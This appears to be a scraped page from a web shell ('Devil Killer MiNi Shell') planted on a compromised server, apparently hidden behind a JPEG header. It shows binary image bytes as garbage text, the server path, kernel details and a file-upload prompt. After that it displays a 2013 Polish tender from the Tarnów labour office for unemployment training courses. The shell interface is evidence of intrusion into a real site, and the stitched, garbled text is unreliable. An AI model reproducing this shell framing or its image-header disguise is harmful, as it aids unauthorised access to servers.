JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130516/192020-N-2013.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla osób bezrobotnych 
i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie

CZĘŚĆ I zamówienia - Kurs kwalifikacji wstępnej przyspieszonej w zakresie kategorii C, 
                                          C+E, C1, C1+E prawa jazdy dla 30 osób,
CZĘŚĆ II zamówienia - Pielęgnacja i stylizacja paznokci dla 10 osób,
CZĘŚĆ III zamówienia - Fakturzysta z obsługą kasy fiskalnej dla 30 osób,
szkolenia przyjęte do realizacji w 2013 r. - zgodnie z planem szkoleń</b><br>
<b>Numer ogłoszenia: 192020 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla osób bezrobotnych 
i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie

CZĘŚĆ I zamówienia - Kurs kwalifikacji wstępnej przyspieszonej w zakresie kategorii C, 
                                          C+E, C1, C1+E prawa jazdy dla 30 osób,
CZĘŚĆ II zamówienia - Pielęgnacja i stylizacja paznokci dla 10 osób,
CZĘŚĆ III zamówienia - Fakturzysta z obsługą kasy fiskalnej dla 30 osób,
szkolenia przyjęte do realizacji w 2013 r. - zgodnie z planem szkoleń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 1. Przedmiot zamówienia 1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Kwalifikacja wstępna przyspieszona w zakresie kategorii C, C+E, C1, C1+E dla 30 osób, w trzech grupach po 10 osób,
2) szkolenie finansowane jest ze środków publicznych,
3) szkolenie musi zostać przeprowadzone zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity: Dz. U. z 2012 r. Nr 0, poz. 1265, z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53 poz. 314).
4) szkolenie winno obejmować 140 godzin zegarowych lub 139 godzin zegarowych (w przypadku, o którym mowa w § 7 ust. 4 cyt. powyżej rozporządzenia), w tym:
a) część podstawową - teoretyczną trwającą minimum 97 godzin,
b) część specjalistyczną prowadzoną w formie:
- zajęć teoretycznych, trwających minimum 33 godziny,
- zajęć praktycznych w ruchu drogowym, podczas których osoba powinna odbyć minimum 8 godzin jazdy indywidualnej oraz 
- zajęć praktycznych z jazdy w warunkach specjalnych, podczas których osoba powinna odbyć minimum 2 godziny jazdy indywidualnej lub w przypadku, gdy ten zakres szkolenia prowadzony będzie przy wykorzystaniu urządzenia, o którym mowa w art. 39g ust. 11 pkt 2cyt. powyżej ustawy - uznaje się równoważne 1 godzinie jazdy,
5) szkolenie winno zakończyć się testem kwalifikacyjnym przeprowadzonym przez komisję egzaminującą powołaną przez wojewodę,
6) absolwent otrzymuje po zdanym egzaminie (teście kwalifikacyjnym) - Świadectwo kwalifikacji zawodowej (zgodnie z § 19 pkt 1 cyt. powyżej rozporządzenia w sprawie szkolenia kierowców wykonujących przewóz drogowy),
7) w przypadku gdy, absolwent nie zaliczy pozytywnie testu kwalifikacyjnego, o którym wyżej mowa wykonawca zobowiązany jest do wydania zaświadczenia o ukończeniu szkolenia zawierającego: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzająca szkolenie;
8) koszt przeprowadzenia testu kwalifikacyjnego pokrywa wykonawca tj. wchodzi w ogólny koszt szkolenia (musi zostać ujęty w kalkulacji kosztów załącznik nr 4 do SIWZ),
9) czas trwania testu kwalifikacyjnego nie wlicza się do liczby godzin szkolenia,
10) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
11) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
12) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
13) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
14) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-9, 
OPIS - Usługi szkolenia zawodowego. 
CZĘŚĆ II zamówienia

1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Pielęgnacja 
i stylizacja paznokci dla 10 osób, 
2) szkolenie finansowane jest ze środków publicznych, 
3) szkolenie winno obejmować minimum 60 godzin zegarowych zajęć, w tym minimum 50 godzin zajęć praktycznych,
4) program szkolenia winien obejmować w szczególności:
- BHP na stanowisku pracy,
- wyposażenie stanowiska pracy,
- budowa paznokci,
- choroby i fizjologia skóry,
- korekcja wad, 
- manicure kosmetyczny (biologiczny, klasyczny, praca z frezarką, masaż dłoni, parafina, malowanie paznokci w tym french),
- pedicure kosmetyczny (biologiczny, klasyczny, praca z frezarką, parafina, malowanie paznokci w tym french),
- pedicure callus,
- manicure hybrydowy,
- manicure japoński,
- stylizacja paznokci: metoda akrylowa i żelowa UV,
- paznokcie w stylu RUSSIAN STYLE, COMBO,
- wzornictwo,
5) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie,
6) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
7) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
8) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
9) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
10) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-9, 
OPIS - Usługi szkolenia zawodowego. 
CZĘŚĆ III zamówienia

1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Fakturzysta 
z obsługą kasy fiskalnej dla 30 osób, w dwóch grupach po 15 osób,
2) szkolenie finansowane jest ze środków publicznych, 
3) szkolenie winno obejmować minimum 75 godzin zegarowych zajęć, w tym minimum 60 godzin zajęć praktycznych,
4) program szkolenia winien obejmować w szczególności:
- podstawowe wiadomości dotyczące sprzedaży,
- podstawy obsługi komputera,
- obsługę programu do fakturowania FPP,
- wystawianie faktur i paragonów,
- podstawy towaroznawstwa,
- dokumentację handlową i magazynową,
- obsługa kasy fiskalnej,
5) liczba uczestników szkolenia przypadająca na jedno stanowisko praktycznej nauki zawodu wynosi 1 osoba (tj. każda osoba uczestnicząca w szkoleniu musi posiadać do dyspozycji 1 kasę fiskalną oraz 1 stanowisko komputerowe z odpowiednim oprogramowaniem niezbędnym do przeprowadzenia szkolenia),
6) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie,
7) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
8) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
9) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
10) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
11) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-9, 
OPIS - Usługi szkolenia zawodowego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - w celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2013 rok,
- w celu wykazania posiadania uprawnień Wykonawca musi posiadać wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia prowadzonego przez wojewodę właściwego ze względu na miejsce wykonywania działalności w zakresie objętym zamówieniem,
CZĘŚĆ II ZAMÓWIENIA - w celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2013 rok, CZĘŚĆ III ZAMÓWIENIA - w celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2013 rok</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 10 osób z zakresu Kwalifikacja wstępna przyspieszona 
w zakresie kategorii C, C+E, C1 i C1+E prawa jazdy,
CZĘŚĆ II ZAMÓWIENIA - Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 10 osób z zakresu Pielęgnacji i stylizacji paznokci,CZĘŚĆ III ZAMÓWIENIA - Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 15 osób, w zakresie Fakturzysta z obsługą kasy fiskalnej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - w celu wykazania dysponowaniem odpowiednim potencjałem technicznym Wykonawca musi dysponować potencjałem technicznym w zakresie infrastruktury technicznej, warunków lokalowych, wyposażenia dydaktycznego oraz pojazdów używanych w trakcie szkolenia, 
o którym mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym oraz rozporządzeniu Ministra Infrastruktury w sprawie szkolenia kierowców wykonujących przewóz drogowy,
CZĘŚĆ II ZAMÓWIENIA - w celu wykazania dysponowaniem odpowiednim potencjałem technicznym Wykonawca musi posiadać: salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych 
i higienicznych warunków realizacji szkolenia oraz minimum: 5 stanowisk do przeprowadzenia zajęć z zakresu manicure i 5 stanowisk do przeprowadzenia zajęć z zakresu pedicure,
CZĘŚĆ III ZAMÓWIENIA - w celu wykazania dysponowaniem odpowiednim potencjałem technicznym Wykonawca musi posiadać: salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych 
i higienicznych warunków realizacji szkolenia oraz minimum: 15 kas fiskalnych i 15 stanowisk komputerowych z oprogramowaniem niezbędnym do przeprowadzenia szkolenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - w celu wykazania dysponowaniem osobami zdolnymi do wykonania zamówienia Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, o którym mowa w art. 39g ustawy o transporcie drogowym oraz rozporządzeniu w sprawie szkolenia kierowców wykonujących przewóz drogowy,CZĘŚĆ II ZAMÓWIENIA - w celu wykazania dysponowaniem osobami zdolnymi do wykonania zamówienia Wykonawca musi zapewnić przeprowadzenie zajęć teoretycznych i praktycznych przez minimum 1 osobę, osoba ta musi posiadać: wykształcenie wyższe zgodne z zakresem prowadzonych zajęć, co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć oraz przygotowanie pedagogiczne,CZĘŚĆ III ZAMÓWIENIA - w celu wykazania dysponowaniem osobami zdolnymi do wykonania zamówienia Wykonawca musi zapewnić:
przeprowadzenie zajęć teoretycznych przez co najmniej 1 osobę posiadającą wykształcenie wyższe zgodne z zakresem prowadzonych zajęć, co najmniej 5 letni staż pracy zgodny 
z kierunkiem kształcenia oraz przygotowanie pedagogiczne,
przeprowadzenie zajęć praktycznych przez co najmniej 2 osoby posiadające wykształcenie minimum średnie zgodne z zakresem prowadzonych zajęć, co najmniej 5-letni staż pracy zgodny z kierunkiem kształcenia oraz przygotowanie pedagogiczne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I, II i III  ZAMÓWIENIA     - Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>CZĘŚĆ I ZAMÓWIENIA1) Kalkulacja kosztów szkolenia (załącznik nr 4).
2) Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3) Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4) Formularz ofertowy (załącznik nr 1).
5) Program szkolenia pn. Kwalifikacja wstępna przyspieszona w zakresie kategorii C, C+E, C1, C1+E prawa jazdy, zgodny z opisem przedmiotu zamówienia (załącznik nr 3).
6) Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
7) Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
8) Imienny wykaz kadry dydaktycznej prowadzącej zajęcia na szkoleniu (załącznik nr 7).

CZĘŚĆ II ZAMÓWIENIA1) Kalkulacja kosztów szkolenia (załącznik nr 4).
2) Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3) Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4) Formularz ofertowy (załącznik nr 1).
5) Program szkolenia pn. Pielęgnacja i stylizacja paznokci, zgodny z opisem przedmiotu zamówienia (załącznik nr 3).
6) Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
7) Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).

CZĘŚĆ III ZAMÓWIENIA1) Kalkulacja kosztów szkolenia (załącznik nr 4).
2) Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3) Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4) Formularz ofertowy (załącznik nr 1).
5) Program szkolenia pn. Fakturzysta z obsługą kasy fiskalnej, zgodny 
z opisem przedmiotu zamówienia (załącznik nr 3).
6) Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
7) Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru w następujący sposób:
1) w uzasadnionych przypadkach, za zgodą Zamawiającego, dopuszcza się zmianę kadry prowadzącej szkolenie - pod warunkiem, że proponowana kadra będzie spełniała warunki opisane w niniejszej specyfikacji. Informacja o zmianie musi wpłynąć do Zamawiającego 
na piśmie, na co najmniej jeden dzień przed zaistniałą okolicznością; 
2) w uzasadnionych przypadkach, za zgodą Zamawiającego, dopuszcza się zmianę miejsca prowadzenia szkolenia. Informacja o zmianie musi wpłynąć do Zamawiającego na piśmie 
co najmniej 5 dni roboczych przed rozpoczęciem szkolenia. W przypadku nagłych zdarzeń losowych termin ten nie musi być zachowany. Informacja musi wpłynąć na piśmie 
